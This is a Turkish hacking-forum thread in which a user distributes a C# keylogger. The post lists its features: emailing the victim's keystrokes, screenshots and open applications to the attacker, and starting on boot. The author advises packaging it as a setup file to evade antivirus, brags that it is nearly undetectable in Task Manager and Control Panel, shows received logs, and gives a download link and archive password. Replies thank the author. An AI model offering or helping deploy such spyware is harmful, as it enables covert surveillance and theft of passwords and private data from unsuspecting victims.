Efsane Logger v0.1

efsane4242

Uzman üye
30 Ocak 2013
1,039
0
32
Konya
Merhaba arkadaşlar size logger programını source kodlarıyla atıyorum c# dan az cok anlayan arkadaşlar girip icerisine gerekli düzenlemeleri yaparak kendilerine göre ayarlayabilirler Gmail ile kullanacaksanız eger Bu siteden tiki aktif etmeniz gerekmektedir https://myaccount.google.com/lesssecureapps.Programı Bastan Assagı Kendım Kodladım Takıldıgınız bir yer olursa sorabilirsiniz. Bozulma derdi yok Çok stabil çalışmakta kod yapısı cok basit az bucuk anlayan insanların bakarak adım adım nerde ne yapılmış anlaması cok kolay. Siz buna grafik vs ekleyerek geliştirebilirsiniz CodeDom olayını bilmedigim için proje olarak paylaşıyorum. Bilen Birisi Varsa Derleyerek daha kullanıslı hale getirebilir. Bilmem daha iyi olmuştur belki öğrenmek isteyen arkadaşlar source kodlarına bakarak öğrenebilirler.ben degiştirilmesi gereken kisimlari yazdim mail adresi ve sifre kisimlarini dolduracaksiniz ve timer1 intervali yanlarina yorum satiri olarak ekledim zaten gerekli doldurulmasi gereken alanlari..

Programın özellikleri

+Program Klavyede basılan tuşları bizim belirttigimiz mail adresine yollar.

+Program belirtilen sure sonunda karşı bilgisayarın ekran görüntüsünü alır ve yollar.

+Program Hedefin Açık olan Uygulamalarını Gösterir.

+Program karşı bilgisayarın interneti yokken yaptıgı klavye Loglarını ve calısan uygulamalarını bize interneti geldiginde mail olarak yollar.

+Başlangıçta Otomatik Aktif Olur.

Arkadaşlar size bir tavsiye daha vereyim Program vürüs olarak algılanıyor ancak siz bunu setup haline getirdiginizde karsı bilgisayar algılayamıyor içerisinde ornek olması acısından kendı setup u mu gosterdim onu yukledıgınızde program yüklendıkten sonra farketmenız neredeyse ımkansızdır sebebi su (Bu arada Arkadaşlar İçerisindeki Setup Dosyası Benım Olusturdugum Bir loggerdir sadece kurulum yapıp masa ustune gelen sımgeye tıklamazsanız denetim masasından geri kaldırabilirsiniz)

Bu programın yuklendıkten sonraki Görev Yöneticisi islemler kısmında (uygulamalar kısmında gözükmez) görüntüsü :
X6580k.png

Anlamak cok zor ben bile ayırt edemedim :D
Buda denetim masasında yuklendıkten sonraki görüntüsü :
DDaWPv.png

Buda baya inandırıcı anlaması mumkun degil cok dikkatlı birisi olması lazım.

Bu Bana gelen Mailler Açık Kalmıs Bugun 70 adet gelmiş:
lZVPWr.png

Bu kısım Gelen Loglar :
dBRlGD.png

Bu Calısan uygulamalar ve ekran goruntusu :
vPqAJ4.png

Programın Vürüs Total Linki : https://virusscan.jotti.org/en-US/filescanjob/a4qfjv7y3t

Download Linki : Dosya.tc - Ücretsiz, Hızlı ve Kolay Dosya Paylaşımı
https://yadi.sk/d/kDjnVZN0Pzf63w

RAR-PASS : 145342

Son düzenleme:
15 Eyl 2018
158
2
31
Elinize emeğinize sağlık hocam.
Bu dönemlerde gerçekten çalışan keylogger bulması baya zor.

efsane4242

Uzman üye
30 Ocak 2013
1,039
0
32
Konya
atarim tabi onaylandiktan sonra neden olmasin.

atarim tabi onaylandiktan sonra neden olmasin.
Yandixe kaydedildi arkadaşlar sanırım bunu crypter gibi onaylanmasına gerek yokmus sabit konulara baktım ama göremedim. Rar şifresinide ekledim bir sorun olursa kaldırsın yoneticiler.

Moderatör tarafında düzenlendi:

PaDDeN

Yeni üye
15 Eyl 2018
37
0
Debug dosyasının içine exe yi otomatik kuruyor zaten exe yi isteyenler debug dosyasına girsin :) eline sağlık

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.